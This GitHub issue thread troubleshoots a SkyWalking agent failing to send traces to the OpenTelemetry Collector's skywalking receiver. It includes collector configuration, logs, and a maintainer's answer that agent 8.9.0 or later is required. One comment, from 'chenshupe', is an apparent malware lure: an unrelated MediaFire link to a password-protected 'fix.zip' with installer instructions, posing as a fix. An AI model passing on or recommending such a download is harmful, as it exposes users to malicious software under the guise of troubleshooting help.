### ISSUE TITLE
skywalking-agent can not send trace info to otel-collector

### ISSUE THREAD

**Issue by yujianweilai** [open-telemetry/opentelemetry-collector-contrib#34902]
### Component(s)

receiver/skywalking

## Description
Previously, we used skywalking-agent to transport trace data to skywalking-server. Now I used otel-collector + jaeger instead of skywalking-server. I hope that the skywalking-agent send the tracing data to otel-collector, and then otel-collector forwards it to jaeger for storage and display.
The problem is that the tracing data cannot be passed to otel-collector.

## Expected Result
skywalking-agent can send the tracing data to otel-collector, and then otel-collector forwards it to jaeger for storage and display.

## Actual Result
i setup some envs about skywalking , like below :
[root@cx-gateway-service-4100-6b6bdd45cc-pvj98 /]# env|grep SW
SW_LOGGING_DIR=/var/log/cx-gateway-service
SW_AGENT_NAME=cx-gateway-service
SW_AGENT_COLLECTOR_BACKEND_SERVICES=10.100.220.63:11800 # IP 10.100.220.63 is one of otel-collector node address
SW_LOGGING_MAX_HISTORY_FILES=50

I trigger a business operation, and I can see the trace information generated by skywalking in the log, but the link call information cannot be displayed on Jaeger
[skywalking-api.zip](https://github.com/user-attachments/files/16781860/skywalking-api.zip)

### Collector version

opentelemetry-collector-contrib:0.85.0

## Environment
OS: (e.g., "Ubuntu 20.04")
centos 7.9
Compiler(if manually compiled): (e.g., "go 14.2")

K8s: 1.19.16

skywalking-agent : 8.0.1

### OpenTelemetry Collector configuration

```yaml
apiVersion: opentelemetry.io/v1alpha1
kind: OpenTelemetryCollector
metadata:
  name: otel
  namespace: opentelemetry-operator-system
spec:
  mode: daemonset
  hostNetwork: true
  image: ghcr.io/open-telemetry/opentelemetry-collector-releases/opentelemetry-collector-contrib:0.85.0
  config: |
    receivers:
      skywalking:
        protocols:
          grpc:
            endpoint: 0.0.0.0:11800
          http:
            endpoint: 0.0.0.0:12800
      #otlp:
      #  protocols:
      #    grpc:
      #    http:
    processors:
      memory_limiter:
        check_interval: 1s
        limit_percentage: 75
        spike_limit_percentage: 15
      batch:
        send_batch_size: 10000
        timeout: 10s
      k8sattributes:
      resource:
        attributes:
          - key: app.host.ip
            from_attribute: k8s.pod.ip
            action: insert
      # end
    extensions:
      health_check:
    exporters:
      # 注意：在v0.86.0之前，请使用`logging`而不是`debug`。
      logging:
        verbosity: detailed
        sampling_initial: 5
        sampling_thereafter: 200
      # Data sources: traces
      #otlp:
      #  endpoint: "http://10.100.220.60:11800" # skywalking oap后端地址  oap-svc:11800,需要修改
      #  tls:
      #    insecure: true
      otlp:
        endpoint: "jaeger.default:4317"
        tls:
          insecure: true
      #otlphttp:
      #  traces_endpoint: 'http://deepflow-agent.deepflow/api/v1/otel/trace'
      #  tls:
      #    insecure: true
      #  retry_on_failure:
      #    enabled: true
    service:
      extensions: [health_check]
      pipelines:
        traces:
          receivers: [skywalking]
          processors: [k8sattributes, resource, memory_limiter, batch]
          exporters: [otlp,logging]
        #metrics:
        #  receivers: [otlp]
```

### Log output

```shell
#bussiness log:
2024-08-28T18:04:47,562 INFO  [rid=TID: 5a7adf1c38874a36ba8a00648858de07.118.17248394850000003] [uid=a5f3659b854f4793b4a6897cd1ee8596] [XNIO-2 task-8] com.xxx.msg.sdk.CXMessageClient - send P2P message, source accountId 883359650965581, deviceTypeFrom MOBILE, dest accountId 883359650967625, deviceTypeTo ALL, msgId 1828735472474542080, globalMessageId a0c886d69-4060-47e1-b1d9-8ea3ce07fc51, usingThirdPush true
2024-08-28T18:04:47,563 INFO  [rid=TID: 5a7adf1c38874a36ba8a00648858de07.118.17248394850000003] [uid=a5f3659b854f4793b4a6897cd1ee8596] [XNIO-2 task-8] com.xxxx.message.controller.MessageController - accountId:883359650965581

#otel-collector log
2024-08-28T10:08:27.770Z	debug	memorylimiterprocessor@v0.85.0/memorylimiter.go:273	Currently used memory.	{"kind": "processor", "name": "memory_limiter", "pipeline": "traces", "cur_mem_mib": 37}
2024-08-28T10:08:28.771Z	debug	memorylimiterprocessor@v0.85.0/memorylimiter.go:273	Currently used memory.	{"kind": "processor", "name": "memory_limiter", "pipeline": "traces", "cur_mem_mib": 37}
2024-08-28T10:08:29.771Z	debug	memorylimiterprocessor@v0.85.0/memorylimiter.go:273	Currently used memory.	{"kind": "processor", "name": "memory_limiter", "pipeline": "traces", "cur_mem_mib": 37}
2024-08-28T10:08:30.771Z	debug	memorylimiterprocessor@v0.85.0/memorylimiter.go:273	Currently used memory.	{"kind": "processor", "name": "memory_limiter", "pipeline": "traces", "cur_mem_mib": 37}
2024-08-28T10:08:31.771Z	debug	memorylimiterprocessor@v0.85.0/memorylimiter.go:273	Currently used memory.	{"kind": "processor", "name": "memory_limiter", "pipeline": "traces", "cur_mem_mib": 37}
2024-08-28T10:08:32.771Z	debug	memorylimiterprocessor@v0.85.0/memorylimiter.go:273	Currently used memory.	{"kind": "processor", "name": "memory_limiter", "pipeline": "traces", "cur_mem_mib": 37}

#skywalking-api.log
see attachment in 'What happened?'
```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JaredTan95** [comment]
what version of skywalking-agent?

**Comment by JaredTan95** [comment]
otel col contrib skywalkingreceiver supports the skywalking agent in version 8.9.0+, try to upgrade the agent version?

**Comment by yujianweilai** [comment]
> otel col contrib skywalkingreceiver supports the skywalking agent in version 8.9.0+, try to upgrade the agent version?
> 
> I will add a version note in skywalkingreceiver soon.

Thank you for locating the problem accurately, because skywalking-agent is integrated into the docker image, so I need to contact R&D tomorrow to deal with it, and if there is any news, I will update the issue as soon as possible.

**Comment by yujianweilai** [comment]
> otel col contrib skywalkingreceiver supports the skywalking agent in version 8.9.0+, try to upgrade the agent version?
> 
> I will add a version note in skywalkingreceiver soon.

You're right !  The trace info of my app could transport from  sw-agent to otel-collector  after  I upgraded the version of sw-agent from 8.0.1 to 9.0.0,  thanks

By the way, i hava some problems about sw-agent
There are some warn, prompts, "not activated" and "not exist" in the skywalking log (see the attached file for details); 
In addition, there are some errors reported in the log, as follows,:
org.springframework.cache.interceptor.DefaultKeyGenerator does not exist. 
ERROR 2024-08-29 11:02:48.437 main InstMethodsInter : class[class org.redisson.cluster.ClusterConnectionManager] after method[createClient] intercept failure 
java.lang.NoSuchMethodError: org.redisson.connection.ConnectionManager.getCfg()Lorg/redisson/config/Config;
	at org.apache.skywalking.apm.plugin.redisson.v3.ConnectionManagerInterceptor.afterMethod(ConnectionManagerInterceptor.java:49)
	at org.apache.skywalking.apm.agent.core.plugin.interceptor.enhance.InstMethodsInter.intercept(InstMethodsInter.java:97)
	at org.redisson.connection.MasterSlaveConnectionManager.createClient(MasterSlaveConnectionManager.java)
	at org.redisson.connection.MasterSlaveConnectionManager.connectToNode(MasterSlaveConnectionManager.java:125)
	at org.redisson.connection.MasterSlaveConnectionManager.connectToNode(MasterSlaveConnectionManager.java:112)
these errors were not exist  before, I don't know if this warn and error were related to my operation that i just replace the newer jar package of sw-agent, but  the library of sw-agent introduced in the code has not been changed .
[skywalking-v9.0.0-api.log](https://github.com/user-attachments/files/16791849/skywalking-v9.0.0-api.log)

Another question is that the traceid format generated by skywalking-agent liked as  790d9b2d75d24c3e8c35be66c2873dbc.138.17249009418040005 , it is different from the traceid format specified in the OTEL protocol, so if we use "skywalking + otel architecture",  how do we use a traceID generated by  skywalking-agent to qu ery the trace info from OTEL

**Comment by JaredTan95** [comment]
> By the way, i hava some problems about sw-agent There are some warn, prompts, "not activated" and "not exist" in the skywalking log (see the attached file for details); In addition, there are some errors reported in the log, as follows,: org.springframework.cache.interceptor.DefaultKeyGenerator does not exist. ERROR 2024-08-29 11:02:48.437 main InstMethodsInter : class[class org.redisson.cluster.ClusterConnectionManager] after method[createClient] intercept failure java.lang.NoSuchMethodError: org.redisson.connection.ConnectionManager.getCfg()Lorg/redisson/config/Config; at org.apache.skywalking.apm.plugin.redisson.v3.ConnectionManagerInterceptor.afterMethod(ConnectionManagerInterceptor.java:49) at 

Looks like your agent does not support `redisson` lib your java app used. 
BTW, I have the impression that this question has been asked in the skywalking community, where you can find issues and solutions.

> Another question is that the traceid format generated by skywalking-agent liked as 790d9b2d75d24c3e8c35be66c2873dbc.138.17249009418040005 , it is different from the traceid format specified in the OTEL protocol, so if we use "skywalking + otel architecture", how do we use a traceID generated by skywalking-agent to qu ery the trace info from OTEL

Notice that when the skywalking traces export to the otel col, the traceid is converted to the otlp protocol.
